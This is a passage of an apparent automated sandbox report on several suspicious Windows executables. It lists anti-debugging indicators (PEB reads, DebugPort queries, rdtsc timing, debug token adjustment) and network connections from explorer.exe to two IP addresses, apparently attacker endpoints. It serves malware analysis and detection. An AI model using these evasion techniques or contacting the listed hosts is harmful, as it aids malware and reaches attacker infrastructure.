                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129674D mov esi, dword ptr fs:[00000030h]8_2_0129674D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129674D mov eax, dword ptr fs:[00000030h]8_2_0129674D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129674D mov eax, dword ptr fs:[00000030h]8_2_0129674D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EE75D mov eax, dword ptr fs:[00000030h]8_2_012EE75D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01260750 mov eax, dword ptr fs:[00000030h]8_2_01260750
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2750 mov eax, dword ptr fs:[00000030h]8_2_012A2750
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2750 mov eax, dword ptr fs:[00000030h]8_2_012A2750
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E4755 mov eax, dword ptr fs:[00000030h]8_2_012E4755
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012607AF mov eax, dword ptr fs:[00000030h]8_2_012607AF
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013147A0 mov eax, dword ptr fs:[00000030h]8_2_013147A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130678E mov eax, dword ptr fs:[00000030h]8_2_0130678E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012827ED mov eax, dword ptr fs:[00000030h]8_2_012827ED
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012827ED mov eax, dword ptr fs:[00000030h]8_2_012827ED
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012827ED mov eax, dword ptr fs:[00000030h]8_2_012827ED
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EE7E1 mov eax, dword ptr fs:[00000030h]8_2_012EE7E1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012647FB mov eax, dword ptr fs:[00000030h]8_2_012647FB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012647FB mov eax, dword ptr fs:[00000030h]8_2_012647FB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126C7C0 mov eax, dword ptr fs:[00000030h]8_2_0126C7C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E07C3 mov eax, dword ptr fs:[00000030h]8_2_012E07C3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127E627 mov eax, dword ptr fs:[00000030h]8_2_0127E627
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01296620 mov eax, dword ptr fs:[00000030h]8_2_01296620
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01298620 mov eax, dword ptr fs:[00000030h]8_2_01298620
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126262C mov eax, dword ptr fs:[00000030h]8_2_0126262C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE609 mov eax, dword ptr fs:[00000030h]8_2_012DE609
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127260B mov eax, dword ptr fs:[00000030h]8_2_0127260B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127260B mov eax, dword ptr fs:[00000030h]8_2_0127260B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127260B mov eax, dword ptr fs:[00000030h]8_2_0127260B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127260B mov eax, dword ptr fs:[00000030h]8_2_0127260B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127260B mov eax, dword ptr fs:[00000030h]8_2_0127260B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127260B mov eax, dword ptr fs:[00000030h]8_2_0127260B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127260B mov eax, dword ptr fs:[00000030h]8_2_0127260B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2619 mov eax, dword ptr fs:[00000030h]8_2_012A2619
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A660 mov eax, dword ptr fs:[00000030h]8_2_0129A660
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A660 mov eax, dword ptr fs:[00000030h]8_2_0129A660
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132866E mov eax, dword ptr fs:[00000030h]8_2_0132866E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132866E mov eax, dword ptr fs:[00000030h]8_2_0132866E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01292674 mov eax, dword ptr fs:[00000030h]8_2_01292674
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127C640 mov eax, dword ptr fs:[00000030h]8_2_0127C640
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129C6A6 mov eax, dword ptr fs:[00000030h]8_2_0129C6A6
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012966B0 mov eax, dword ptr fs:[00000030h]8_2_012966B0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01264690 mov eax, dword ptr fs:[00000030h]8_2_01264690
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01264690 mov eax, dword ptr fs:[00000030h]8_2_01264690
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE6F2 mov eax, dword ptr fs:[00000030h]8_2_012DE6F2
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE6F2 mov eax, dword ptr fs:[00000030h]8_2_012DE6F2
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE6F2 mov eax, dword ptr fs:[00000030h]8_2_012DE6F2
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE6F2 mov eax, dword ptr fs:[00000030h]8_2_012DE6F2
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E06F1 mov eax, dword ptr fs:[00000030h]8_2_012E06F1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E06F1 mov eax, dword ptr fs:[00000030h]8_2_012E06F1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0129A6C7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A6C7 mov eax, dword ptr fs:[00000030h]8_2_0129A6C7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E892A mov eax, dword ptr fs:[00000030h]8_2_012E892A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F892B mov eax, dword ptr fs:[00000030h]8_2_012F892B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE908 mov eax, dword ptr fs:[00000030h]8_2_012DE908
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE908 mov eax, dword ptr fs:[00000030h]8_2_012DE908
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EC912 mov eax, dword ptr fs:[00000030h]8_2_012EC912
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01258918 mov eax, dword ptr fs:[00000030h]8_2_01258918
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01258918 mov eax, dword ptr fs:[00000030h]8_2_01258918
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A096E mov eax, dword ptr fs:[00000030h]8_2_012A096E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A096E mov edx, dword ptr fs:[00000030h]8_2_012A096E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A096E mov eax, dword ptr fs:[00000030h]8_2_012A096E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01304978 mov eax, dword ptr fs:[00000030h]8_2_01304978
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01304978 mov eax, dword ptr fs:[00000030h]8_2_01304978
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01286962 mov eax, dword ptr fs:[00000030h]8_2_01286962
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01286962 mov eax, dword ptr fs:[00000030h]8_2_01286962
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01286962 mov eax, dword ptr fs:[00000030h]8_2_01286962
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EC97C mov eax, dword ptr fs:[00000030h]8_2_012EC97C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E0946 mov eax, dword ptr fs:[00000030h]8_2_012E0946
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334940 mov eax, dword ptr fs:[00000030h]8_2_01334940
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A0 mov eax, dword ptr fs:[00000030h]8_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012609AD mov eax, dword ptr fs:[00000030h]8_2_012609AD
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012609AD mov eax, dword ptr fs:[00000030h]8_2_012609AD
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E89B3 mov esi, dword ptr fs:[00000030h]8_2_012E89B3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E89B3 mov eax, dword ptr fs:[00000030h]8_2_012E89B3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E89B3 mov eax, dword ptr fs:[00000030h]8_2_012E89B3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EE9E0 mov eax, dword ptr fs:[00000030h]8_2_012EE9E0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012929F9 mov eax, dword ptr fs:[00000030h]8_2_012929F9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012929F9 mov eax, dword ptr fs:[00000030h]8_2_012929F9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132A9D3 mov eax, dword ptr fs:[00000030h]8_2_0132A9D3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F69C0 mov eax, dword ptr fs:[00000030h]8_2_012F69C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A9D0 mov eax, dword ptr fs:[00000030h]8_2_0126A9D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A9D0 mov eax, dword ptr fs:[00000030h]8_2_0126A9D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A9D0 mov eax, dword ptr fs:[00000030h]8_2_0126A9D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A9D0 mov eax, dword ptr fs:[00000030h]8_2_0126A9D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A9D0 mov eax, dword ptr fs:[00000030h]8_2_0126A9D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A9D0 mov eax, dword ptr fs:[00000030h]8_2_0126A9D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012949D0 mov eax, dword ptr fs:[00000030h]8_2_012949D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130483A mov eax, dword ptr fs:[00000030h]8_2_0130483A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130483A mov eax, dword ptr fs:[00000030h]8_2_0130483A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A830 mov eax, dword ptr fs:[00000030h]8_2_0129A830
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01282835 mov eax, dword ptr fs:[00000030h]8_2_01282835
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01282835 mov eax, dword ptr fs:[00000030h]8_2_01282835
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01282835 mov eax, dword ptr fs:[00000030h]8_2_01282835
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01282835 mov ecx, dword ptr fs:[00000030h]8_2_01282835
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01282835 mov eax, dword ptr fs:[00000030h]8_2_01282835
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01282835 mov eax, dword ptr fs:[00000030h]8_2_01282835
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EC810 mov eax, dword ptr fs:[00000030h]8_2_012EC810
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EE872 mov eax, dword ptr fs:[00000030h]8_2_012EE872
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EE872 mov eax, dword ptr fs:[00000030h]8_2_012EE872
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F6870 mov eax, dword ptr fs:[00000030h]8_2_012F6870
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F6870 mov eax, dword ptr fs:[00000030h]8_2_012F6870
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01272840 mov ecx, dword ptr fs:[00000030h]8_2_01272840
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01290854 mov eax, dword ptr fs:[00000030h]8_2_01290854
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01264859 mov eax, dword ptr fs:[00000030h]8_2_01264859
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01264859 mov eax, dword ptr fs:[00000030h]8_2_01264859
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01260887 mov eax, dword ptr fs:[00000030h]8_2_01260887
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EC89D mov eax, dword ptr fs:[00000030h]8_2_012EC89D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129C8F9 mov eax, dword ptr fs:[00000030h]8_2_0129C8F9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129C8F9 mov eax, dword ptr fs:[00000030h]8_2_0129C8F9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132A8E4 mov eax, dword ptr fs:[00000030h]8_2_0132A8E4
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E8C0 mov eax, dword ptr fs:[00000030h]8_2_0128E8C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013308C0 mov eax, dword ptr fs:[00000030h]8_2_013308C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128EB20 mov eax, dword ptr fs:[00000030h]8_2_0128EB20
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128EB20 mov eax, dword ptr fs:[00000030h]8_2_0128EB20
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01328B28 mov eax, dword ptr fs:[00000030h]8_2_01328B28
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01328B28 mov eax, dword ptr fs:[00000030h]8_2_01328B28
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DEB1D mov eax, dword ptr fs:[00000030h]8_2_012DEB1D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DEB1D mov eax, dword ptr fs:[00000030h]8_2_012DEB1D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DEB1D mov eax, dword ptr fs:[00000030h]8_2_012DEB1D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DEB1D mov eax, dword ptr fs:[00000030h]8_2_012DEB1D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DEB1D mov eax, dword ptr fs:[00000030h]8_2_012DEB1D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DEB1D mov eax, dword ptr fs:[00000030h]8_2_012DEB1D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DEB1D mov eax, dword ptr fs:[00000030h]8_2_012DEB1D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DEB1D mov eax, dword ptr fs:[00000030h]8_2_012DEB1D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DEB1D mov eax, dword ptr fs:[00000030h]8_2_012DEB1D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334B00 mov eax, dword ptr fs:[00000030h]8_2_01334B00
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125CB7E mov eax, dword ptr fs:[00000030h]8_2_0125CB7E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130EB50 mov eax, dword ptr fs:[00000030h]8_2_0130EB50
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01332B57 mov eax, dword ptr fs:[00000030h]8_2_01332B57
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01332B57 mov eax, dword ptr fs:[00000030h]8_2_01332B57
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01332B57 mov eax, dword ptr fs:[00000030h]8_2_01332B57
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01332B57 mov eax, dword ptr fs:[00000030h]8_2_01332B57
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F6B40 mov eax, dword ptr fs:[00000030h]8_2_012F6B40
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F6B40 mov eax, dword ptr fs:[00000030h]8_2_012F6B40
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132AB40 mov eax, dword ptr fs:[00000030h]8_2_0132AB40
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01308B42 mov eax, dword ptr fs:[00000030h]8_2_01308B42
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01258B50 mov eax, dword ptr fs:[00000030h]8_2_01258B50
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01314B4B mov eax, dword ptr fs:[00000030h]8_2_01314B4B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01314B4B mov eax, dword ptr fs:[00000030h]8_2_01314B4B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01314BB0 mov eax, dword ptr fs:[00000030h]8_2_01314BB0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01314BB0 mov eax, dword ptr fs:[00000030h]8_2_01314BB0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270BBE mov eax, dword ptr fs:[00000030h]8_2_01270BBE
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270BBE mov eax, dword ptr fs:[00000030h]8_2_01270BBE
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128EBFC mov eax, dword ptr fs:[00000030h]8_2_0128EBFC
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01268BF0 mov eax, dword ptr fs:[00000030h]8_2_01268BF0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01268BF0 mov eax, dword ptr fs:[00000030h]8_2_01268BF0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01268BF0 mov eax, dword ptr fs:[00000030h]8_2_01268BF0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012ECBF0 mov eax, dword ptr fs:[00000030h]8_2_012ECBF0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130EBD0 mov eax, dword ptr fs:[00000030h]8_2_0130EBD0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01280BCB mov eax, dword ptr fs:[00000030h]8_2_01280BCB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01280BCB mov eax, dword ptr fs:[00000030h]8_2_01280BCB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01280BCB mov eax, dword ptr fs:[00000030h]8_2_01280BCB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01260BCD mov eax, dword ptr fs:[00000030h]8_2_01260BCD
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01260BCD mov eax, dword ptr fs:[00000030h]8_2_01260BCD
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01260BCD mov eax, dword ptr fs:[00000030h]8_2_01260BCD
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128EA2E mov eax, dword ptr fs:[00000030h]8_2_0128EA2E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129CA24 mov eax, dword ptr fs:[00000030h]8_2_0129CA24
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129CA38 mov eax, dword ptr fs:[00000030h]8_2_0129CA38
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01284A35 mov eax, dword ptr fs:[00000030h]8_2_01284A35
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01284A35 mov eax, dword ptr fs:[00000030h]8_2_01284A35
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012ECA11 mov eax, dword ptr fs:[00000030h]8_2_012ECA11
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129CA6F mov eax, dword ptr fs:[00000030h]8_2_0129CA6F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129CA6F mov eax, dword ptr fs:[00000030h]8_2_0129CA6F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129CA6F mov eax, dword ptr fs:[00000030h]8_2_0129CA6F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130EA60 mov eax, dword ptr fs:[00000030h]8_2_0130EA60
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DCA72 mov eax, dword ptr fs:[00000030h]8_2_012DCA72
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DCA72 mov eax, dword ptr fs:[00000030h]8_2_012DCA72
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01266A50 mov eax, dword ptr fs:[00000030h]8_2_01266A50
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01266A50 mov eax, dword ptr fs:[00000030h]8_2_01266A50
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01266A50 mov eax, dword ptr fs:[00000030h]8_2_01266A50
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01266A50 mov eax, dword ptr fs:[00000030h]8_2_01266A50
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01266A50 mov eax, dword ptr fs:[00000030h]8_2_01266A50
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01266A50 mov eax, dword ptr fs:[00000030h]8_2_01266A50
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01266A50 mov eax, dword ptr fs:[00000030h]8_2_01266A50
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270A5B mov eax, dword ptr fs:[00000030h]8_2_01270A5B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270A5B mov eax, dword ptr fs:[00000030h]8_2_01270A5B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01268AA0 mov eax, dword ptr fs:[00000030h]8_2_01268AA0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01268AA0 mov eax, dword ptr fs:[00000030h]8_2_01268AA0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012B6AA4 mov eax, dword ptr fs:[00000030h]8_2_012B6AA4
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126EA80 mov eax, dword ptr fs:[00000030h]8_2_0126EA80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126EA80 mov eax, dword ptr fs:[00000030h]8_2_0126EA80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126EA80 mov eax, dword ptr fs:[00000030h]8_2_0126EA80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126EA80 mov eax, dword ptr fs:[00000030h]8_2_0126EA80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126EA80 mov eax, dword ptr fs:[00000030h]8_2_0126EA80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126EA80 mov eax, dword ptr fs:[00000030h]8_2_0126EA80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126EA80 mov eax, dword ptr fs:[00000030h]8_2_0126EA80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126EA80 mov eax, dword ptr fs:[00000030h]8_2_0126EA80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\a\setup.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\a\setup.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\a\setup.exeProcess queried: DebugObjectHandle
                    Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
                    Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
                    Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A096E rdtsc 8_2_012A096E
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004170A3 LdrLoadDll,8_2_004170A3
                    Source: C:\Users\user\Desktop\New_Text_Document.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\explorer.exeNetwork Connect: 99.83.196.71 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
